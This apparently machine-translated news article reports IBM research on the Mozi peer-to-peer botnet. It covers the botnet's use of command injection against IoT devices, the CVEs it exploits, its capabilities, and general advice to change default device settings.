Mozi botnet: Responsible for most attacks on IoT devices

According to IBMThe Mozi, a relatively new one botnet is responsible for increase in Internet of Things (IoT) botnet activity.

The Mozi botnet has been used a lot in the last year and represented it 90% of IoT network traffic, observed between October 2019 and June 2020. However, the researchers found that it carried out attacks without trying to remove its competitors from breached systems.

On the other hand, the large increase in IoT attacks Appliances is not solely due to the effectiveness of the botnet. It is largely due to increased use of IoT devices worldwide. More Appliances mean more opportunities for attacks. According to IBM, there are about 31 billion IoT devices worldwide.

Researchers believe that the success of the Mozi botnet is based on usage "Command injection (CMDi)" attacks, which are based on incorrect configurations on IoT devices. The combination of increased use of IoT devices and incorrect protocols is responsible for increasing attacks. Of course, the prolonged remote work due to COVID-19, also plays an important role.

The researchers observed that almost all attacks targeting IoT devices use the CMDi technique for initial access. Mozi botnet utilizes CMDi using a "wget" shell command and then violates the rights to facilitate the intruders' interaction with the target system.

IBM said that on vulnerable devices, a file with the name was downloaded “Mozi.a” and then executed in MIPS architecture. The attack targets machines that use RISC computer architecture (MIPS is a "RISC instruction set architecture") and can enable a hacker to modify the firmware for installation of additional malware.

Mozi botnet targets many vulnerabilities to infect IoT devices: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE -2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router command injection, Netgear setup.cgi RCE, execution of MVPower DVR commands , execute D-Link UPnP SOAP and RCE commands that affect many CCTV-DVR vendors.

The hackers behind Mozi botnet use infrastructure located mainly in China (84%).

"Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can be spread through exploits of IoT devices and weak telnet passwordsSays IBM.

According to IBM, the botnet can be used for realization denial-of-service attacks (DDoS), for execution of malicious commands, The perform additional payloads and collection of information.

In accordance with SecurityWeek, researchers stress that organizations that use IoT devices need to address this increasingly common threat. The "Command injection"Remains the main form of infection, so it is important to change the default settings of the device and make continuous checks to find possible gaps security.